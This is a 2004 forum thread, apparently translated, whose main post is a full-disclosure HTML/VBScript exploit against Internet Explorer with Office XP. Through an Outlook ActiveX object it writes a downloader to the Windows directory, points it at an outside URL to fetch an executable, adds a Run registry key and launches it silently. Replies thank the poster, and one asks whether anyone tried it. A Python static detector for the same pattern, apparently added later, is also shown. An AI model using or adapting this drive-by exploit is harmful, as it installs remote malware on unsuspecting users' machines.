Virtual-Attack

MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« on: 8 August 2004, 05:13 »

Here is this interesting exploit .....
___________________________________________________

Code:
<HTML>
<HEAD>
<TITLE>MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT</TITLE>
</HEAD>
<BODY>
<OBJECT id="InterfaceObject" classid="clsid:0006F063-0000-0000-C000-000000000046" WIDTH=0 HEIGHT=0>
<param name="folder" value="Inbox">
</OBJECT>

<SCRIPT LANGUAGE="VBSCRIPT">
<!-- hide for safe browsers

dim FileContent,fso,windir,file,filename,key,wshshell,landurl,overflow,dnloadurl

'the 3 main steps in this script
SetupFile
Upload
Run

'sets up the binary data of downloader.exe in memory
sub SetupFile()
'we set up the filecontent variable which contains the binary data
'of downloader.exe, its parameters are parsed into the file directly
'using this script, adapt them to your needs
FileContent=Array()
'WIN32ASM DOWNLOADER PARAMETER 1 : DOWNLOAD URL
dnloadurl="http://www.duho.org/eatme.exe"
overflow=0
if len(dnloadurl) > 29 then overflow = len(dnloadurl)-29
FileContent=FileContent+dnloadurl+chr(0)+wstring("A",98-overflow)
'WIN32ASM DOWNLOADER PARAMETER 2 : TARGET LOCATION (incl. drive+path)
landurl = "/takeover.exe"
overflow=0
if len(landurl) > 13 then overflow = len(landurl)-13
FileContent=FileContent+landurl+chr(0)+wstring("A",114-overflow)
end sub

'writes downloader.exe to disk in the windows directory
sub Upload()
'set up the object, and use it to load the filesystemobject,
'enabling us (among other things) to write stuff to disk
set inbox = InterfaceObject.object.selection
set mail = inbox.Item(1)
set fso = mail.Session.Application.CreateObject("Scripting.FileSystemObject")
'get the windoze dir and write downloader.exe (=FileContent) to disk
windir = fso.getspecialfolder(0)
filename = "downloader.exe"
set file = fso.opentextfile(windir+"\"+filename, "2", "TRUE")
file.write FileContent
file.close()
end sub

sub Run()
'set up the object, and use it to load the windows shell object,
'enabling us to write registry keys
'and run files
key = "HKLM\Software\Microsoft\WinNT\CurrentVersion\Run\win386"
set wshShell = mail.Session.Application.CreateObject("WScript.Shell")
wshShell.regwrite key,filename
wshShell.run filename,"0","FALSE"
set wshShell = Nothing
set fso = Nothing
set inbox = Nothing
set mail = Nothing
set file = Nothing
end sub

'function that decodes our fake-ascii-hex-binary into true binary
Function Decode(Text)
dim x,thebyte,temptext
For x = 1 To Len(Text) Step 2
thebyte = Chr(38) & "H" & Mid(Text, x, 2)
temptext = temptext & Chr(thebyte)
Next
Decode = temptext
End Function

'function that offers us simple compression, by replacing e.g. 1000 zero
'characters ("000...") by one function name: wstring("0",1000)
function wstring(text,times)
dim x
for x=1 to times
wstring = wstring & text
next
end function
-->
</script>

<noscript>
Sorry, you have to view this page with Internet Explorer 4.0 or higher, <br> also enable scripting, activex  and <br>
install officeXP in order to be vulnerable.
</noscript>

</BODY>
</HTML>
« Last edit: 8 August 2004, 08:46 by Rojodos »

Every time I learn more, I realize that I can keep learning :)
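
A static check for the pattern in the page posted above, as an added example that is not part of the original post: it flags HTML that embeds the same `classid` and then calls `CreateObject` through `Session.Application`. The rule names, verdict labels and sample pages are constructed for illustration.

```python
import re

# Indicators are copied from the page posted above; the rule names, verdict
# labels and sample pages are assumptions constructed for this example.
CLSID = "0006F063-0000-0000-C000-000000000046"
RULES = {
    "embedded_object": re.compile(
        r"<object\b[^>]*\bclassid\s*=\s*[\"']?clsid:" + re.escape(CLSID), re.I),
    "app_createobject": re.compile(
        r"\.session\.application\.createobject\s*\(", re.I),
    "fso_or_shell": re.compile(
        r"createobject\s*\(\s*[\"'](scripting\.filesystemobject|wscript\.shell)[\"']",
        re.I),
    "hex_mz_blob": re.compile(r"[\"']4d5a[0-9a-f]{20,}", re.I),
    "run_key_write": re.compile(r"\\currentversion\\run\b", re.I),
}

# Constructed samples: the first mirrors the structure of the posted page
# without any payload, the other two are unrelated pages.
SUSPECT = '''<OBJECT id="o" classid="clsid:0006F063-0000-0000-C000-000000000046">
</OBJECT><SCRIPT LANGUAGE="VBSCRIPT">
set m = o.object.selection.Item(1)
set f = m.Session.Application.CreateObject("Scripting.FileSystemObject")
</SCRIPT>'''
PARTIAL = '<script language="vbscript">set s = CreateObject("WScript.Shell")</script>'
BENIGN = '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"></object>'


def scan(html: str) -> dict:
    """Return the rules that fired and a verdict for one HTML document."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(html))
    # The object tag combined with the Session.Application call is the core
    # of the posted page: script reaches CreateObject through the control.
    if {"embedded_object", "app_createobject"} <= set(hits):
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for name, page in (("suspect", SUSPECT), ("partial", PARTIAL), ("benign", BENIGN)):
        print(name, scan(page))
```
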
eLank0
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Reply #1 on: 8 August 2004, 06:11 »

Haven't you seen around here that code has to go between CODE tags??

Virtual-Attack

Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Reply #2 on: 8 August 2004, 06:42 »

Elanko: Yes, I have seen that.. but I post them this way.
I posted the exploit code so that people can examine it or use it for something... not so that they criticize the way it is posted.

Regards...                         8)

eLank0
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Reply #3 on: 8 August 2004, 07:11 »

 :-[ :-[ :-[ :-[

I wasn't criticizing, I'm simply repeating it...

Rojodos
Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Reply #4 on: 8 August 2004, 08:47 »

I have put it between CODE tags myself.

It is much better this way.

Regards

Linuxtron

Re: MS INTERNET EXPLORER + OFFICEXP FULL DISCLOSURE EXPLOIT
« Reply #5 on: 9 August 2004, 05:10 »

Has anyone tried it?

thx for the exploit
